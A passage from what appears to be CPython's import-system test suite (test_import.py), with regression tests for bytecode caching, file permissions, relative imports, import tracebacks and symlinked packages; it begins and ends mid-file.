sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w', encoding='utf-8') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w", encoding='utf-8') as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w", encoding='utf-8') as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w", encoding='utf-8') as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w", encoding='utf-8') as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w', encoding='utf-8') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
# bpo 38091: this is a hack to slow down the code that calls
# has_deadlock(); the logic was itself sometimes deadlocking.
def delay_has_deadlock(frame, event, arg):
if event == 'call' and frame.f_code.co_name == 'has_deadlock':
time.sleep(0.1)
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
sys.settrace(delay_has_deadlock)
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
sys.settrace(None)
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with threading_helper.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with os_helper.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(glob.escape(sys.prefix), "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w', encoding='utf-8') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w', encoding='utf-8') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w", encoding='utf-8') as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'),
'w', encoding='utf-8') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_parentless_import_shadowed_by_global(self):
# Test as if this were done from the REPL where this error most commonly occurs (bpo-37409).
script_helper.assert_python_failure('-W', 'ignore', '-c',
"foo = 1; from . import foo")
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w', encoding='utf-8') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'wb'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'wb'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'wb'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'wb'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a', encoding='utf-8') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
os_helper.rmtree(self.tagged)
os_helper.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(os_helper.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
os_helper.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(os_helper.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@os_helper.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w", encoding='utf-8') as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w', encoding='utf-8') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w', encoding='utf-8') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
